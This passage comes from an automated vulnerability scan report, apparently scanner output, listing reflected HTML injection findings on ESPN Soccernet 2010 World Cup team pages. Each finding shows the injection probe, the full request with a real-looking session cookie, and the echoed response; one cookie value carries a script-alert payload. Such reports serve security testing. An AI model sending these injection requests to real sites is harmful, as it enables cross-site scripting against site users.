Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN07
Cache-Expires: Sat, 06 Nov 2010 23:30:17 GMT
Content-Length: 82085
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovakia Football / ...[SNIP]... <a href="/worldcup2010/team?team=468&c864f"><a>dc103401107=1&_slug_=slovakia&c864f"> ...[SNIP]...
2.35. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/472/slovenia
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69682"><a>ede52c78078 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia69682"><a>ede52c78078 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:12 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:33:12 GMT
Content-Length: 81860
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&_slug_=slovenia69682"><a>ede52c78078&topId=801122&linktext=Slovenia+come+to+terms+with+exit"> ...[SNIP]...
2.36. http://soccernet.espn.go.com/worldcup2010/team/_/team/472/slovenia [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/472/slovenia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64674"><a>258595f7676 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/472/slovenia?64674"><a>258595f7676=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:25:20 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:25:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN21
Cache-Expires: Sat, 06 Nov 2010 23:30:19 GMT
Content-Length: 81968
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674"> ...[SNIP]...
2.37. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/475/switzerland
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82022
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss"> ...[SNIP]...
2.38. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/475/switzerland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:17 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT
Content-Length: 82130
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d"> ...[SNIP]...
2.39. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/478/france
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT
Content-Length: 80435
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns"> ...[SNIP]...
2.40. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/478/france
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT
Content-Length: 80543
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3"> ...[SNIP]...
2.41. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [REST URL parameter 6]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;

Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT
Server: Microsoft-IIS/6.0
